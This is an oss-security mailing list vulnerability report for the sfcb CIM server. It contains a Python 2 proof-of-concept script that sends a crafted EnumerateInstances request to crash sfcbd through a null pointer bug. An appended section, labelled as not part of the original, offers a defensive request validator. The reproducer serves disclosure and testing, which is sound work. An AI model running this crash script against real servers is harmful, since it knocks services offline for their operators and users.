
List:       oss-security
Subject:    [oss-security] report a vulnerability in sfcb software.
From:       XinleiHe <hxl1999 () yeah ! net>
Date:       2018-01-31 14:44:22
Message-ID: 722994b1.3f3f.1614cad02fb.Coremail.hxl1999 () yeah ! net

Hi there,


I am XinleiHe. I will report a vulnerability in sfcb software.
SFCB is a CIM server for resource-constrained and embedded environments. Its official website is sblim.sourceforge.net/wiki/index.php/Sfcb.
A null pointer vulnerability exists in the newest version of sfcb (1.4.9). A remote attacker can send a crafted packet to trigger this vulnerability and cause a DoS of sfcbd. I want to apply for a CVE ID for this vulnerability.




You can use the following Python code to reproduce this vulnerability.
--------------------------------------------------------------
# Python 2 script (httplib module, print statement)
import httplib
from xml.dom.minidom import Document


class write_xml(Document):
    def __init__(self):
        Document.__init__(self)

    def set_tag(self, tag):
        self.tag = tag
        self.cim = self.createElement(self.tag)
        #self.setAttribute("encoding", "utf-8")

        self.cim.setAttribute("CIMVERSION", "2.0")
        self.cim.setAttribute("DTDVERSION", "2.0")
        self.appendChild(self.cim)

        self.msg = self.createElement("MESSAGE")
        self.msg.setAttribute("ID", "4711")
        self.msg.setAttribute("PROTOCOLVERSION", "1.0")
        self.cim.appendChild(self.msg)

        self.sim = self.createElement("SIMPLEREQ")
        self.msg.appendChild(self.sim)

        self.ime = self.createElement("IMETHODCALL")
        self.ime.setAttribute("NAME", "EnumerateInstances")
        self.sim.appendChild(self.ime)

        self.local = self.createElement("LOCALNAMESPACEPATH")
        self.ime.appendChild(self.local)

        self.names1 = self.createElement("NAMESPACE")
        self.names1.setAttribute("NAME", "root")
        self.local.appendChild(self.names1)

    def display(self):
        print self.toprettyxml(indent="   ")

    def retdata(self):
        return self.toprettyxml(indent="   ")


def httpreq(data):
    conn = httplib.HTTPConnection("127.0.0.1", 5988, False)
    conn.request('POST', '/cimom', data)
    res = conn.getresponse()


def main():
    wx = write_xml()
    wx.set_tag('CIM')
    print wx.retdata()
    print httpreq(wx.retdata())


if __name__ == '__main__':
    main()
-------------------------------------------------------
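
Added example, not part of the original message and not sfcb code: a structural pre-check (Python 3) that a proxy or test harness in front of a CIM server could apply to request bodies. The request built above carries no ClassName IPARAMVALUE, which DSP0200 requires for EnumerateInstances; the report does not say which part of the request triggers the crash, so treating that omission as the thing to reject is an assumption, and `check_cim_request`, `TEMPLATE` and the class name are illustrative.

```python
import xml.etree.ElementTree as ET

# Intrinsic methods for which DSP0200 makes ClassName a required parameter
# (subset chosen for this example).
NEEDS_CLASSNAME = {"EnumerateInstances", "EnumerateInstanceNames", "GetClass"}

# Constructed sample: same element layout as the request built by the script above.
TEMPLATE = (
    '<?xml version="1.0" ?><CIM CIMVERSION="2.0" DTDVERSION="2.0">'
    '<MESSAGE ID="4711" PROTOCOLVERSION="1.0"><SIMPLEREQ>'
    '<IMETHODCALL NAME="EnumerateInstances"><LOCALNAMESPACEPATH>'
    '<NAMESPACE NAME="root"/></LOCALNAMESPACEPATH>%s'
    '</IMETHODCALL></SIMPLEREQ></MESSAGE></CIM>'
)
# Constructed parameter; the class name is a placeholder.
CLASSNAME_PARAM = ('<IPARAMVALUE NAME="ClassName">'
                   '<CLASSNAME NAME="CIM_ComputerSystem"/></IPARAMVALUE>')


def check_cim_request(body):
    """Return a list of structural problems in a CIM-XML request (empty = accept)."""
    # Refuse DTDs outright so the filter itself is not exposed to entity expansion.
    if "<!DOCTYPE" in body or "<!ENTITY" in body:
        return ["DTD or entity declarations are not accepted"]
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]
    if root.tag != "CIM":
        return ["root element is %r, expected 'CIM'" % root.tag]
    calls = root.findall("./MESSAGE/SIMPLEREQ/IMETHODCALL")
    problems = [] if calls else ["no MESSAGE/SIMPLEREQ/IMETHODCALL element"]
    for call in calls:
        name = call.get("NAME", "")
        if not call.findall("./LOCALNAMESPACEPATH/NAMESPACE[@NAME]"):
            problems.append("%s: missing LOCALNAMESPACEPATH/NAMESPACE" % name)
        if name in NEEDS_CLASSNAME:
            cls = call.find("./IPARAMVALUE[@NAME='ClassName']/CLASSNAME")
            if cls is None or not cls.get("NAME"):
                problems.append("%s: missing ClassName parameter" % name)
    return problems


if __name__ == "__main__":
    print(check_cim_request(TEMPLATE % ""))               # request shaped like the one above
    print(check_cim_request(TEMPLATE % CLASSNAME_PARAM))  # same request with ClassName supplied
```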


